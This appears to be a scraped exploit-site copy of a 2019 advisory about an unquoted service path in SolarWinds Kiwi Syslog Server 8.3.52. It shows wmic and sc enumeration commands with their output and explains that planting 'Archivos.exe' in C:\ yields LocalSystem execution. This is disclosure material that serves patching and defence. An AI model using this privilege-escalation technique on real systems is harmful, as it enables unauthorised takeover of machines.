Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

SolarWinds Kiwi Syslog Server 8.3.52 Unquoted Service Path
# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
# Date: 2019-11-08
# Exploit Author: Carlos A Garcia R
# Vendor Homepage:
# Software Link:
# Version: 8.3.52
# Tested on: Windows XP Professional Service Pack 3

# Description:
# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs

# PoC:

# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Kiwi Syslog ServerKiwi Syslog ServerC:\Archivos de programa\Syslogd\Syslogd_Service.exeAuto

# C:\>sc qc "Kiwi Syslog Server"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit
Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" 
could be placed in "C:\", and it would be executed as the Local System user 
next time the service was restarted.

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.